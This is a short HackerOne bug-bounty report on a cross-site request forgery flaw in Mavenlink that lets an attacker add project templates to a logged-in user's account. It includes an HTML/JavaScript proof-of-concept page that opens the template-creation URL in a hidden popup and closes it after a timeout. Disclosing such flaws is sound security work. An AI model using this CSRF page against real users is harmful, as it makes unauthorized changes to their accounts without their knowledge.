Mavenlink: CSRF Add user templates

2018-01-03T09:04:03
ID H1:301919
Type hackerone
Reporter tolo7010
Modified 2019-02-27T23:39:23

Description

Reproduction:

  • Log in to the account
  • Visit the CSRF page below (note the default 30-second timeout, which can be adjusted to the connection speed):

  <!doctype html>
  <html>
    <head></head>
    <body>
      <script>
        // Open the project-template creation page in a small popup window
        // while the victim is logged in to Mavenlink.
        var a = window.open("https://app.mavenlink.com/project_templates#new", "csrf", "height=100,width=100");
        // Close the popup after 30 seconds (30000 ms); adjust to the connection speed.
        var timeoutID = setTimeout(function () { a.close(); }, 30000);
      </script>
    </body>
  </html>

Impact

CSRF Add user templates